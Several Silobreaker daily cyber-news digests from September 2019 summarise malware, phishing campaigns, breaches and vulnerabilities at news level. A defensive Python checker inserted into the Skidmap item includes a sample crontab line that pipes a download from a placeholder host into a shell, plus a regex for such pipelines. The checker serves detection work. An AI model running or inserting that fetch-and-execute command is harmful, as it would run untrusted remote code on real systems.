Silobreaker Daily Cyber Digest – 20 September 2019


 

Malware

Agent Tesla leveraged in email campaign

  • Discovered by Xavier Mertens, the email campaign attempts to deliver an ACE archive labelled ‘Parcel Frieght Details.pdf.ace’, which contains a malicious Agent Tesla executable. This executable is capable of contacting an attacker’s C2 server via SMTP, FTP and HTTP to exfiltrate data.
  • The C2 server used in this instance belongs to a Pakistan-based healthcare company, but it is located in Los Angeles, US. It has many open ports and vulnerabilities, and has been compromised by the attacker behind the campaign for data exfiltration purposes.

Source (Includes IOCs)

 

Malicious extensions removed from Chrome Web Store

  • Two extensions, ‘AdBlock’ by ‘AdBlock, Inc’ and ‘uBlock’ by ‘Charlie Lee’, used misleading names similar to those of legitimate extensions and were also performing cookie stuffing, a technique where extra information is added to users’ cookies to hijack affiliate traffic from its legitimate source. The two extensions were adding a parameter to cookies to ensure that the authors would earn a commission from any payments on certain sites.
  • ‘AdBlock’ had over 800,000 installs, and ‘uBlock’ had over 850,000, at the time of their removal from the Chrome Web Store. Google also disabled the extensions in all users’ browsers.

Source

 

Two adware apps on Google Play Store have over 1.5 million downloads

  • Researchers at Wandera discovered two selfie filter camera apps, Sun Pro Beauty Camera and Funny Sweet Beauty Camera, which contain adware. The apps are hosted on the Google Play Store and have a combined download count of 1.5 million.
  • Sun Pro Beauty Camera displays full-screen ads even if the app is never opened. Funny Sweet Beauty Camera starts to display full-screen ads outside the app when a filtered photo is downloaded. The researchers also found that the apps requested concerning permissions, such as installing shortcuts, recording audio, and more.

Source

 

Ongoing Campaigns

New Emotet campaign already using new delivery methods

  • Following the revival of the Emotet botnet on September 16th, 2019, researchers are already reporting on evolving distribution methods, malicious attachments, and email templates. Researchers have speculated that Emotet is owned by TA542, who rent out parts of the botnet to other threat actors.
  • To date, Emotet has been delivered via attachments or through malicious links contained in emails. Malicious documents are designed to trick targets into enabling macros by claiming that the file is in ‘Protected View’ or by stating that they must ‘Accept the License agreement’. In both instances, enabling content results in the installation of Emotet. Additionally, researchers observed attackers using PowerShell, or WScript to execute JScript, to install the payload.
  • The Cryptolaemus security research group identified that Emotet has split into three ‘Epochs’, which are subgroups of the overall botnet. Each Epoch uses its own C2s, distribution methods, payloads, and assigned bots.

Source (Includes IOCs)

 

GhostMiner malware uses fileless attack method and terminates rival miners

  • On August 2nd, 2019, researchers at Trend Micro identified a fileless cryptocurrency-mining malware, named GhostMiner, that uses Windows Management Instrumentation (WMI) objects for persistence, payload delivery, and AV evasion.
  • The arrival details of this particular attack have not been discovered, but previously the malware has attacked servers by exploiting vulnerabilities in phpMyAdmin, MSSQL, and others. Once installed, the malware drops a 64-bit payload that mines Monero cryptocurrency. The wallet associated with this campaign holds approximately $3,868.
  • The malware also checks for rival miners such as MyKings, PowerGhost, PCASTLE, and others. When GhostMiner detects other miners, it terminates their processes and deletes their scheduled tasks.

Source (Includes IOCs)

 

Android trojan campaign targeting banking customers

  • The campaign targets Russian customers of 70 banks, payment systems and web-wallets, and is estimated to have stolen at least 35 million rubles ($547,000). In particular, it targets users who place advertisements on Avito, a Russian classifieds website.
  • The Fanta Trojan is delivered via a phishing site that pretends to be Avito, tricking a user into downloading the malicious application to their phone instead of the legitimate app. Bank details are then stolen by making the user open a phishing page that is disguised as the legitimate mobile banking application.
  • Capable of bypassing anti-virus tools, the trojan also checks which apps are running on the user’s device and reads the notifications of banking applications, payment systems and e-wallets.

Source

 

Hackers steal over 20,000 US citizens’ card details by targeting Click2Gov portal

  • Researchers at Gemini Advisory discovered that during August 2019 hackers compromised eight Click2Gov portals used by cities across the US. The researchers discovered that the hackers have stolen 20,000 card details, which are already being traded on the dark web. Click2Gov is a web-based self-service portal that handles tax and bill payments for municipalities across North America; the product is sold by Central Square.
  • Click2Gov was originally targeted in 2017 by a hacker group using custom malware tools, named Spotlight and Firealarm, that had been specially designed to access the portal. The group stole over 300,000 card details from at least 46 cities in 2017 and 2018.
  • Of the eight cities attacked in August 2019, six had been breached in 2017 and 2018, which suggests the hackers may have left a backdoor. However, this has not been confirmed, and it is also unclear how the hackers breached the portals of the two previously unaffected cities.

Source

 

 

Leaks and Breaches

Thinkful Inc data breach results in mass password reset

  • Code training company Thinkful Inc notified customers that an employee’s account credentials were compromised by an unauthorized party. The company stated that users who log in to the platform will have to reset their password.
  • Thinkful Inc stated that there is no evidence that any customer data or user information had been accessed.

Source

 

Magellan Health subsidiaries suffer data breach

  • A statement issued by Magellan Health said that two of its subsidiaries, National Imaging Associates and Magellan Healthcare, had discovered a potential cyber breach related to members of Presbyterian Health Plan. An anonymous third party gained access to two employee email accounts between May 28th and June 6th, 2019, via a phishing campaign. Potentially exposed data includes names, dates of birth, health authorization information, dates of service and some Social Security Numbers.
  • The Magellan Health incident is claimed to have impacted almost 56,000 individuals, and the National Imaging Associates breach affected around 600.

Source

 

Verlo Mattress Factory exposes over 387,000 customer records

  • Researchers at Security Discovery identified an unprotected Elastic database that belonged to Verlo Mattress Factory. The researchers found 387,604 records which contained names, phone numbers, emails, home addresses, and billing addresses. The database also exposed login details and hashed passwords for internal users, and IP addresses, ports, and more.
  • The researchers contacted Verlo Mattress Factory but did not receive any reply. The database was however secured soon after initial contact was made.

Source

 

Vulnerabilities

Vulnerability discovered in popular WordPress plugin

  • A cross-site scripting vulnerability was discovered in Easy Social Feed, a popular WordPress plugin with over 100,000 installs. Publicly released proof-of-concept code could allow an attacker to interfere with a visitor’s browsing session.
  • As of September 20th, 2019, version 4.4.1 is available to download, but it is not clear from the changelog if this issue is fixed.

Source

 

General News

Chinese students in UK targeted by scammers

  • Researchers at Malwarebytes stated that the scam appears to have begun in 2015. The criminals pretend to represent government bodies or law enforcement and claim that visa issues can be resolved with a payment. The attackers have also begun to target Indian students and demand payment via Western Union. 

Source

 

Old Magecart domains being bought for additional threat campaigns

  • Researchers at RiskIQ identified that sinkholed domains that have been used in Magecart attacks are being bought by criminals when they are re-released back to the pool of available domains. The domains retain their value because they still receive ‘call-outs to malicious domains placed on breached websites by attackers’. Attackers can continue to launch Magecart attacks through them or can use them for malvertising or ad-fraud schemes.

Source 1 Source 2

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 19 September 2019

 

Malware

Ramnit returns with new capabilities

  • Researchers at RSA Security observed several changes in the functionality, targets and methods of distribution of Ramnit. The banking trojan was first discovered in 2010 and operates as a botnet targeting the banking industry in North America and Europe.
  • The new variant uses web injects to steal credentials and was seen targeting Japanese entities. Additionally, rather than using its worm capabilities for distribution, the new variant is spread via executable files, specifically by using malspam campaigns to deliver the files.
  • A detailed analysis on the recent findings is available in the Q2 2019 RSA Quarterly Fraud Report.

Source

 

Ongoing Campaigns

DDoS attack using WSD method peaks at 35 GB per second

  • Researchers at Akamai identified a DDoS attack against one of their clients in the gaming industry which used a UDP amplification technique known as WS-Discovery (WSD). The WSD protocol is used in an array of network devices.
  • The researchers found a wide range of CCTV cameras and DVR systems on the internet that were incorrectly exposing and responding to WSD.
  • Because UDP is a stateless protocol, requests to the WSD service can be spoofed. Attackers can therefore use these devices to amplify the power of their attacks. The researchers stated that this attack method could amplify the original byte size by up to 15,300%, which places the method 4th on the DDoS attack leaderboard for highest reflected amplification rates.

Source

 

Microsoft phishing page emails stolen credentials to attacker

  • Security researchers at MalwareHunterTeam identified a new phishing scam which relayed stolen details to an attacker by using the SmtpJS service to send an email via JavaScript. Usually in such cases, the stolen information is stored in a database or sent to the attacker via a backend script.
  • Analysis of the SmtpJS configuration in the page reveals the sender’s email address and the email address that stolen information will be sent to. Using this method of credential delivery is risky for the attacker and could allow law enforcement and researchers to easily identify them.
  • Reporters at Bleeping Computer stated that there was ‘nothing special’ about the phishing page itself.

Source

 

Smominru botnet continues to pose major threat

  • Researchers at Guardicore Labs have been tracking the Smominru botnet and its variants since 2017. The researchers identified 90,000 machines around the world which were compromised with Smominru in August 2019. Attacks using the botnet are indiscriminate and reach victims in a range of sectors.
  • The botnet primarily compromises Windows machines using the EternalBlue exploit. Older versions of Windows, such as Windows 7 and Windows Server 2008, represent 85% of all infected machines. The researchers found that in a quarter of cases reinfection occurred after cleaning, which suggests that targets are failing to identify the infection path.
  • When a machine is compromised, Smominru attempts to block other malware’s activity, installs numerous backdoors and downloads tools that can steal credentials, cryptocurrency and more. The malware also attempts to move laterally through infected networks.
  • A full analysis of Smominru including indicators of compromise is available via Guardicore Labs.

Source (Includes IOCs) 

 

Magecart attack targets hotel chain booking website

  • In early September 2019, researchers at Trend Micro identified a Magecart attack targeting the booking websites of hotel chains. The malicious JavaScript has been present since August 9th, 2019, and only ran on Android or iOS phones.
  • Both websites were developed by Spanish company Roomleader. The malicious code was injected into the ‘viewedHotels’ script developed by the company and used by the hotel chains. The attacker replaced the original credit card form with their own to ensure that they gain a complete set of details.
  • When a user attempts to submit a form on the site, the skimmer copies form field names and values, including names, email addresses, telephone numbers, hotel room preferences, and credit card details. Copied information is encrypted with RC4 using a hardcoded key and then XOR-encoded again before the data is sent via HTTP POST to a remote URL specified by the attacker.

Source

 

Hacker Groups

Tortoiseshell Group targets IT providers in the Middle East

  • Researchers at Symantec discovered a new threat actor, dubbed Tortoiseshell Group, which has been active since at least July 2018, targeting IT providers in the Middle East. Researchers have identified 11 organisations that have been targeted by Tortoiseshell so far, the majority of which are in Saudi Arabia. The researchers stated that the group is attacking IT providers in order to compromise their customers.
  • At present the group’s initial attack vector is unclear; however, researchers suspect that they compromise web servers to deploy malware onto target networks. Following the initial infection, the group uses a mixture of custom and off-the-shelf malware.
  • Tortoiseshell developed its own basic backdoor malware, named Backdoor.Syskit, which downloads and executes additional tools and commands and relays system information to the attacker’s C2.
  • The group also uses publicly available info stealers and PowerShell scripts. At least two of Tortoiseshell’s victims had info gatherers deployed to the Netlogon folder on a domain controller. Researchers stated that this indicates the attackers had domain-level access on those networks.

Source (Includes IOCs) 

 

Leaks and Breaches

Exposed server contained 1.7 TB of data from Russian telecoms providers

  • UpGuard researchers discovered a publicly accessible rsync server containing 1.7 TB of data from multiple Russian telecommunication providers. The majority of data appears to be linked to Nokia and Mobile TeleSystems. According to Nokia, the data set ‘was a hand-over folder’ belonging to an unnamed third-party that failed to follow Nokia’s security procedures. In addition, the data set was not hosted by Nokia. The server has since been secured.
  • Exposed data included schematics, administrative credentials, email archives, and more, relating to telecom infrastructure projects, as well as photographs and installation instructions for the telecommunication interception hardware SORM.

Source

 

Scotiabank exposes sensitive information via public GitHub repositories

  • Security researcher Jason Coulls found public GitHub repositories containing sensitive information belonging to Scotiabank, including software blueprints, access keys for foreign exchange rate systems, mobile application codes, login credentials for services, database instances, and more.
  • According to Coulls, who discovered the bank to be using expired security certificates in 2017, Scotiabank ‘usually leak information once every three weeks on average.’ Scotiabank has not commented on the incident, however, its security team is investigating the matter.

Source

 

24 million patient records exposed in major medical data leak

  • Greenbone Networks’ research into the massive medical data leak found 24 million exposed patient records, with 700 million images related to these records, 400 of which are downloadable.
  • The previously reported number of 16 million records was a figure discovered by ProPublica and Bayerischer Rundfunk, who also investigated the data leak.

Source

 

Vulnerabilities

XSS vulnerabilities found in Social Metrics Tracker plugin

  • A persistent cross-site scripting (XSS) flaw was found in the WordPress Social Metrics Tracker plugin due to an improperly secured export functionality, as well as a potential reflected XSS vulnerability.

Source

 

phpMyAdmin contains zero-day vulnerability

  • A medium-severity cross-site request forgery vulnerability in phpMyAdmin, tracked as CVE-2019-12922, could allow an attacker to delete servers configured on the setup page of a phpMyAdmin panel. Security researcher Manuel Garcia, who discovered the flaw, points out that exploitation is only possible with interaction between the attacker and the victim.
  • The vulnerability is present in all versions of phpMyAdmin up to 4.9.0.1 as well as phpMyAdmin 5.0.0-alpha1.
  • The company failed to release a patch within 90 days of receiving Garcia’s report, which led him to release details and a proof-of-concept of the flaw.

Source

 

VMware issues patches for multiple vulnerabilities

Source

 

Update to Windows Defender breaks Quick and Full antivirus scan

  • Windows Defender 4.18.1908.7 is impacted by a bug that prevents users from performing Quick or Full scans. When performing either of these operations Windows Defender only scans approximately 40 files on the device before terminating the process.
  • Microsoft resolved the issue by releasing an updated version of Windows Defender on September 18th, 2019.

Source

 

Critical vulnerability discovered in Harbor allows privilege escalation

  • Security researcher Aviv Sasson at Palo Alto Networks Unit 42 identified a critical vulnerability, tracked as CVE-2019-16097, in the open source cloud native registry Harbor 1.7.0 through 1.8.2.
  • The flaw allows non-administrative users to create administrator accounts by using a script that sends a POST request to ‘api/users’. The flaw allows an attacker to take over Harbor registries.
  • The issue was patched by the Harbor developers; however, researchers discovered over 1,300 Harbor registries exposed on the internet which are still vulnerable.

Source

 

General News

Australian Senate President admits data was stolen in 2018 parliament hacking

  • During questioning by Centre Alliance Senator Rex Patrick, Senator Scott Ryan confirmed that a ‘small amount of data’ was taken in the 2018 Australian parliament hacking, however none was deemed sensitive.
  • Senator Ryan refused to give details regarding the recent reports from Reuters that Australian security agencies concluded China was behind the hacking.

Source

 


Silobreaker Daily Cyber Digest – 18 September 2019

 

Malware

New TSCookie variant uses new configuration and communication protocols

  • Researchers at Japan’s Computer Emergency Response Team Coordination Center observed a new variant of TSCookie being deployed in a campaign by BlackTech, targeting Japanese users.
  • The malware consists of a loader and a downloader and is used once the threat actor has gained access to a targeted network. The loader, in EXE or DLL format, is capable of reading and executing files. The loader also decrypts the downloader, which is RC4-encrypted. The downloader is then executed in memory.
  • The new variant supports HTTP, HTTPS and a custom protocol, and any data sent is also RC4-encrypted.

Source (Includes IOCs)

 

Increase in activity from TFlower ransomware

  • The malware was first discovered in early August 2019 and is installed on devices after criminals gain access to exposed remote desktop services. TFlower malware infects local machines and also attempts to move laterally through compromised networks.
  • Following the initial infection, the malware begins encrypting files on the victim’s machine and connects to the attacker’s C2 to provide status updates. The ransomware avoids files in the Windows or Sample Music folder. TFlower also attempts to disable the Windows 10 repair environment and tries to delete Shadow Volume Copies.
  • Once the encryption process is complete the malware will leave a ransom note on the victim’s machine. Researchers are currently trying to determine if there is a flaw in TFlower, which could allow impacted users to decrypt their files.

Source (Includes IOCs)

 

New variant of HDDCryptor discovered

  • Researchers at Trend Micro discovered a new variant of HDDCryptor, also known as Mamba, which is known to use the open-source tool DiskCryptor for encryption and overwriting of the Master Boot Record.
  • The new variant was found to use a modified DiskCryptor component and, in addition, changes in the contact information provided in the ransom note were also found. The remainder of the variant behaves the same as the original version first discovered in 2016.
  • The researchers warn that threat actors continue to use such open-source tools to avoid detection by security solutions and that partially modified tools could lead to false alarm cases.

Source (Includes IOCs)

 

Ongoing Campaigns

Scam targets Venmo LLC users via text messages

  • The Dighton Police Department issued a warning about a phishing scam targeting Venmo LLC customers. The attackers deliver a text message to victims which contains a malicious link to a fake Venmo login page. Targets are instructed to log in to avoid charges being applied to their account.
  • Regardless of the validity of the login that a user provides, the phishing page allows them to proceed to a secondary page where financial information, such as a bank card number, is requested.

Source

 

Restaurant Depot customers targeted in phishing attacks following data breach

  • A phishing campaign is targeting customers of the New York-based wholesale vendor Restaurant Depot by sending fake invoices containing malicious links. The emails appear to be sent from the company’s mailing list.
  • Restaurant Depot has stated it is aware of the email list compromise and has advised its customers to delete any emails indicating an invoice is due without opening it.

Source

 

Fake IRS page used to drop Amadey botnet

  • Researchers at Cofense discovered a new phishing campaign that delivers the Amadey botnet malware. The malware was first seen at the end of the first quarter of 2019 and is rented out to cybercriminals. Notable users include the threat group TA505, who used the botnet in July 2019 to deliver email stealers and the FlawedAmmyy RAT.
  • This recent campaign begins with an email which purports to be from the Internal Revenue Service (IRS) and provides a hyperlink to a fake IRS login page. The email states that the target is eligible for a tax refund and provides them with a username and password.
  • When the target logs into the fake page they are told they can claim their refund by downloading a document contained within the attached ZIP file. Targets who open the file run a highly obfuscated and encrypted VBScript which drops and installs Amadey. The botnet communicates with the attackers’ C2 and relays information such as the device’s antivirus software, system name, and operating system.

Source (Includes IOCs)

 

Hacker Groups

Panda cryptomining threat group continues to pose a threat to organizations globally

  • Researchers at Cisco Talos published an analysis of the Panda threat group. Their research found that the criminals continue to update their infrastructure, exploits and payloads. The Panda group was first spotted in summer 2018 and focuses on mining Monero using RATs and cryptomining malware. The group has targeted financial, healthcare, transportation and IT organizations.
  • Despite their lack of sophistication and poor operational security, the group is ‘one of the most active attackers’ that the researchers have examined. Panda is able to change its infrastructure and exploits rapidly and is currently using exploits previously used by threat actor Shadow Brokers. The group is also comfortable using open source tools such as the credential stealer Mimikatz.

Source (Includes IOCs)

 

Identity of operator behind Adwind RAT family revealed

  • Researchers at Palo Alto Networks identified the developer behind the multi-platform Adwind RAT family, which was first sold in early 2012. Since its first iteration the malware has been rebranded at least seven times and has moved from being a commodity malware to one which is sold to a closed customer base. The researchers state the RAT has consistently been under the ownership of the original author despite its many rebrands.
  • The researchers noted that the developer behind the malware practised ‘uncommonly good’ operational security. The author changed his domains, hosting services and infrastructure with every rebrand, as well as faking WHOIS records.
  • The researchers were nevertheless able to identify Adwind’s developer by establishing a link between an email address in a Skype profile used to sell the malware and an academic paper by a Mexican computer science student. The researchers discovered the developer’s name, place of study and hometown and refer to him as ‘Adwind Andrés’.

Source (Includes IOCs)

 

Leaks and Breaches

Medical records of millions of individuals worldwide exposed online

  • Research conducted by Greenbone Networks, ProPublica, and Bayerischer Rundfunk revealed that hundreds of servers worldwide are exposing medical data. The data can be accessed with free software or through a web browser. Exposed data includes X-rays, MRIs, CT Scans, patient names, dates of birth, and where applicable, social security numbers.
  • ProPublica identified 187 exposed servers in the US that belonged to doctors’ offices, medical-imaging centers and mobile X-ray services. US based company MobilexUSA exposed the data of over a million patients. The data, which included dates of births, doctors, and procedures, was accessible by performing a simple data query.
  • Greenbone Networks determined that there were issues in at least 52 countries related to the exposure of sensitive medical information. In total, medical information from more than 16 million scans worldwide was discovered during the research.

Source

 

Kiwi Farms suffers data breach

  • At least 4,606 users of the forum Kiwi Farms have been affected by a data breach that took place on September 10th, 2019. Exposed data includes email addresses, IP addresses, dates of birth, as well as user content.

Source

 

118,000 individuals potentially affected by 2018 Ramsey County data breach

  • A data breach that took place in Ramsey County, Minnesota, in 2018, may have exposed personal and health information of 118,000 individuals, a major increase from the initial number of 500 that was given by county officials.
  • The data breach was the result of unauthorised access to 28 county email accounts on August 9th, 2018, during which the attackers attempted to steal employee paychecks.
  • Potentially exposed data includes names, addresses and Social Security numbers of 4,600 individuals, and ‘limited amounts of health-related information’ of 113,300 individuals.

Source

 

Lion Air exposes tens of millions of records through exposed Amazon bucket

  • Security researcher Under the Breach published samples of two databases that belong to Lion Air. The databases were stored in an open Amazon Web Services (AWS) bucket. Links to the open AWS bucket were published on August 10th, 2019, and have been circulating on data exchange forums.
  • The first database contains 21 million records and the second contains 14 million records. Most of the information belongs to Lion Air-owned companies Malindo Air and Thai Lion Air.
  • Leaked customer information includes passenger and reservation IDs, physical addresses, phone numbers, email addresses, dates of birth, passport numbers, and more.

Source

 

Researchers discover databases containing personal information collected by GootKit network

  • On July 5th, 2019, researchers at Security Discovery found two open and publicly accessible MongoDB databases linked to GootKit, one of the most advanced banking trojans. The databases were taken down on July 10th, 2019.
  • The databases contained the personal data that GootKit had stolen, which showed that all infected machines were located in Europe, predominantly in Poland, France, United Kingdom, Italy, and Bulgaria.
  • Exposed information included plain text passwords, configuration details, bank accounts, mail account logins, online shops, credit card details, and more. An estimated 1,444,375 email accounts were compromised, as well as 2,196,840 passwords and configuration pairs and 752,645 usernames.

Source

 

Vulnerabilities

Authentication bypass vulnerability found in Ewebtonic software

  • A vulnerability in Ewebtonic’s software allows threat actors to upload files, shells or backdoors to devices without administrator permission. This is possible due to improper identity verification procedures. Once a threat actor gains access, they could also read sensitive data or carry out arbitrary code execution.

Source

 

Google Calendar app publicly displays company information

  • Researcher Avinash Jain identified an issue with the Google Calendar app which allowed him to access company information such as meetings, events, presentation links, and more.
  • Jain discovered that a Google dork search showed over 200 calendars which contained sensitive company information.
  • The issue is an intended feature of Google Calendar; however, the researcher stated that Google does not notify a user if their settings are public and does not notify a company if an employee makes their calendar public.

Source

 

Cisco extends patch for 2016 DoS vulnerability

  • The high-severity vulnerability, tracked as CVE-2016-1409, is found in the IPv6 packet processing function and could allow a remote attacker to prevent a device from processing IPv6 traffic by sending crafted IPv6 Neighbor Discovery packets. This could lead to a denial of service (DoS).
  • Affected products are Cisco IOS XR, Cisco IOS, Cisco XE, Cisco NX-OS, Cisco ASA and Cisco StarOS. As the flaw is the result of a vendor misconfiguration, products by other vendors are also affected, including Huawei and Juniper Junos.

Source

 

Aspose PDF API contains multiple vulnerabilities

  • Researchers at Cisco Talos identified flaws in Aspose APIs that are used to process PDFs. The vulnerabilities can be triggered by tricking a target into opening a specially crafted malicious file with an application that uses a vulnerable API. A full list of flawed components and their associated CVEs is accessible via Cisco Talos.

Source

 

Over 15,000 web connected cameras exposed worldwide

  • Researchers at WizCase identified over 15,000 potentially vulnerable webcams which could be accessed by anyone with an internet connection. The webcams are exposed due to an issue with their remote access functionality. In some instances UPnP was not protected with any authentication; in other cases insecure P2P networking was used.
  • Exposed device types include AXIS net cameras, Cisco Linksys webcams, IP WebCams, Yawcams, and more. The cameras were present in a range of locations including homes, businesses, and public spaces.

Source 1 Source 2

 

General News

ConnectWise Control used in Texas ransomware attacks

  • The investigation into the Texas ransomware attacks that targeted 22 government entities in August 2019 found that a ConnectWise Control instance used by TSM Consulting served as the entry point to the networks.
  • According to ConnectWise’s CISO John Ford, because an on-premises version of the product was used, the company does not have access to the logs or configuration, meaning it does not know whether TSM Consulting used up-to-date versions of the product, whether multi-factor authentication was turned on, or how frequently TSM Consulting patched.

Source

 

Facebook removes multiple fraudulent accounts

  • Facebook removed multiple Facebook and Instagram accounts that were involved in two campaigns of coordinated inauthentic behaviour in which users were misrepresenting themselves. No links between the two campaigns were found.
  • This included 76 Facebook accounts, 120 Pages, one Group, two Events and seven Instagram accounts engaged in domestic-focused coordinated behaviour in Iraq and 168 Facebook accounts, 149 Pages, and 79 Groups involved in domestic-focused coordinated inauthentic behaviour in Ukraine.

Source

 

The Silobreaker Team Disclaimer: Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.

Silobreaker Daily Cyber Digest – 17 September 2019

 

Malware

Skidmap malware achieves persistence through loadable kernel modules

  • Researchers at Trend Micro have identified a Linux-based malware dubbed Skidmap, designed to infect a system and deliver a cryptominer.
  • Skidmap installs itself via crontab before lowering the infected device’s security settings and establishing backdoor access by adding the public key of its handler to the authorized keys file. It also creates a secondary access point by replacing the module responsible for Unix authentication with its own malicious version.
  • The binary then checks whether the target system runs Debian or RHEL/CentOS and drops the miner and other components accordingly. Skidmap achieves persistence by using loadable kernel module (LKM) rootkits to overwrite or modify parts of the OS kernel.
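The four Skidmap persistence techniques summarised above (crontab installer, appended SSH key, replaced PAM module, LKM rootkit) each leave a checkable trace on the host. The script below is an added example written for this digest, not Trend Micro’s or Silobreaker’s code; every file body in it is a constructed sample, and the known-good hash and module baseline are placeholders a real deployment would take from its package manifests and a clean host.

```python
"""Defensive integrity checks for the Skidmap persistence techniques described
above: crontab installer, handler key appended to authorized_keys, replaced
Unix authentication (PAM) module and loadable-kernel-module rootkit.
Added example for this digest, not Trend Micro's or Silobreaker's code. All
file bodies are constructed samples; the good hash and module baseline are
placeholders to be taken from package manifests and a clean host."""
import hashlib
import re

# Constructed key material (not real keys). The admin key is approved; the
# second stands in for one appended by an implant.
ADMIN_KEY = "AAAAC3NzaC1lZDI1NTE5AAAAIEXAMPLEADMINKEY000000000000000000000000"
UNKNOWN_KEY = "AAAAB3NzaC1yc2EAAAADAQABAAABAQEXAMPLEUNKNOWNKEY00000000000000000000"
ALLOWED_KEYS = {ADMIN_KEY}

SAMPLE_AUTHORIZED_KEYS = f"""\
# approved admin key
ssh-ed25519 {ADMIN_KEY} admin@bastion
ssh-rsa {UNKNOWN_KEY} root@localhost
"""

# Constructed root crontab: one legitimate job, one download-and-execute entry.
SAMPLE_CRONTAB = """\
0 3 * * * /usr/local/bin/backup.sh
*/1 * * * * curl -fsSL http://placeholder.invalid/pm.sh | sh
"""

# Constructed /proc/modules listing with one module missing from the baseline.
SAMPLE_PROC_MODULES = """\
ext4 712704 2 - Live 0x0000000000000000
xfs 1228800 1 - Live 0x0000000000000000
unknown_mod_placeholder 16384 0 - Live 0x0000000000000000
"""
MODULE_BASELINE = {"ext4", "xfs"}

# Constructed stand-ins for the bytes of pam_unix.so before and after replacement.
GOOD_PAM_BYTES = b"placeholder bytes of a pristine pam_unix.so"
TAMPERED_PAM_BYTES = b"placeholder bytes of a replaced pam_unix.so"


def sha256_hex(data: bytes) -> str:
    """Hex SHA-256, used for the PAM module comparison."""
    return hashlib.sha256(data).hexdigest()


# In a real deployment this comes from the package manifest, not from disk.
KNOWN_GOOD_PAM_SHA256 = sha256_hex(GOOD_PAM_BYTES)
KEY_TYPE_PREFIXES = ("ssh-", "ecdsa-", "sk-")


def parse_authorized_keys(text: str) -> list:
    """Return (key_type, key, comment) per key line, tolerating an options prefix
    such as command="..." before the key type; comments and blanks are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split()
        for i, tok in enumerate(parts):
            if tok.startswith(KEY_TYPE_PREFIXES) and i + 1 < len(parts):
                entries.append((tok, parts[i + 1], " ".join(parts[i + 2:])))
                break
    return entries


def unexpected_ssh_keys(text: str, allowed: set) -> list:
    """Keys present in authorized_keys that are not on the approved allowlist."""
    return [e for e in parse_authorized_keys(text) if e[1] not in allowed]


# Download-and-execute pipelines, or payloads staged in world-writable dirs.
CRON_SUSPECT = re.compile(r"\b(curl|wget)\b.*\|\s*(sh|bash)\b|/tmp/|/dev/shm/")


def suspicious_cron_entries(text: str) -> list:
    """Crontab lines matching the download-and-execute pattern."""
    return [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.lstrip().startswith("#")
            and CRON_SUSPECT.search(ln)]


def pam_module_tampered(module_bytes: bytes, known_good_sha256: str) -> bool:
    """True when the on-disk PAM module no longer matches its recorded hash."""
    return sha256_hex(module_bytes) != known_good_sha256


def unexpected_modules(proc_modules_text: str, baseline: set) -> list:
    """Loaded modules absent from the clean-host baseline. A rootkit may hide
    from /proc/modules, so also diff this against /sys/module on a real host."""
    names = [ln.split()[0] for ln in proc_modules_text.splitlines() if ln.strip()]
    return [n for n in names if n not in baseline]


def run_checks(authorized_keys: str, crontab: str, pam_bytes: bytes,
               proc_modules: str) -> dict:
    """Aggregate the four checks into one findings dict."""
    return {
        "ssh_keys": unexpected_ssh_keys(authorized_keys, ALLOWED_KEYS),
        "cron": suspicious_cron_entries(crontab),
        "pam_tampered": pam_module_tampered(pam_bytes, KNOWN_GOOD_PAM_SHA256),
        "modules": unexpected_modules(proc_modules, MODULE_BASELINE),
    }


if __name__ == "__main__":
    for name, result in run_checks(SAMPLE_AUTHORIZED_KEYS, SAMPLE_CRONTAB,
                                   TAMPERED_PAM_BYTES, SAMPLE_PROC_MODULES).items():
        print(f"{name}: {result}")
```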

Source (Includes IOCs)

 

Ongoing Campaigns

Emotet botnet returns with new spam campaign

  • On September 16th, 2019, the operators behind the Emotet botnet launched a new global spam campaign. Attacks have already been reported against government entities, individuals, and companies in Europe and the US.
  • The new campaign follows the reawakening of the botnet’s C2 servers on August 22nd, 2019. The operators behind Emotet prepared for the attack by cleaning out fake bots, putting together the new campaigns, and establishing distribution channels.
  • Researchers at Cofense Labs stated that the malicious messages used in the campaign originated from 3,362 compromised email accounts. The campaign is targeting nearly 66,000 unique email addresses from more than 30,000 domain names across 385 unique top-level domains.
  • The emails used in the campaign tend to be financially themed and contain a malicious attachment which the target is lured into opening. Security researchers James_inthe_box and Brad Duncan identified that Trickbot malware is being delivered after the initial infection.

Source (Includes IOCs)

 

The Guardian’s SecureDrop whistle-blower site targeted with phishing page

  • Security researcher Sh1ttyKids identified a phishing page that mimicked The Guardian’s Tor-based SecureDrop site, which whistle-blowers can use to contact journalists. The attackers were attempting to acquire the unique ‘codename’ used by whistle-blowers.
  • The malicious site, which has now been removed, also contained a link to an Android app which purported to hide a user’s location. In actuality the app contains multiple RAT-like functions which allow for monitoring location, calls and texts, stealing data, and more.

Source

 

Threat actor uses stolen identity to purchase legitimate digital certificates

  • Researchers at ReversingLabs observed a threat actor impersonating company heads, especially ones in the software industry, when purchasing digital certificates, which are then sold on the dark web to be used for digitally signing malware.
  • The researchers’ analysis of one such impersonation attack showed that the fraudulently obtained certificate was used to sign 22 executable files, with those that were malicious belonging to the OpenSUpdater malware family.
  • A detailed analysis of the attack is available on ReversingLabs’ blog.

Source (Includes IOCs)

 

Hacker Groups

Charming Kitten active again after short absence

  • ClearSky researchers observed an increase in activity by Charming Kitten, also known as APT35, Ajax, or Phosphorus, after a short absence following the 2019 Microsoft complaint against the group’s operation. The group also does not appear to have been affected by the sensitive data leak of Iranian APT groups in April 2019.
  • The new campaign targets non-Iranian academic researchers from the US, the Middle East and France with a research focus on Iran, as well as Iranian dissidents in the US. Since August 2019, the group has been observed targeting influential public figures, moving away from solely targeting academic researchers.
  • Additionally, the researchers discovered the group now adds trackers to its email correspondence, allowing it to track forwarded emails and obtain information on geolocations.

Source (Includes IOCs)

 

Leaks and Breaches

Database leaks information of over 20 million predominantly Ecuadorian individuals

  • Researchers at vpnMentor discovered an exposed database which belonged to Ecuadorian consulting company Novaestrat. The database contained 18GB of data and the details of over 20 million individuals, the majority of whom are Ecuadorian. Some of those on the database appear to be deceased.
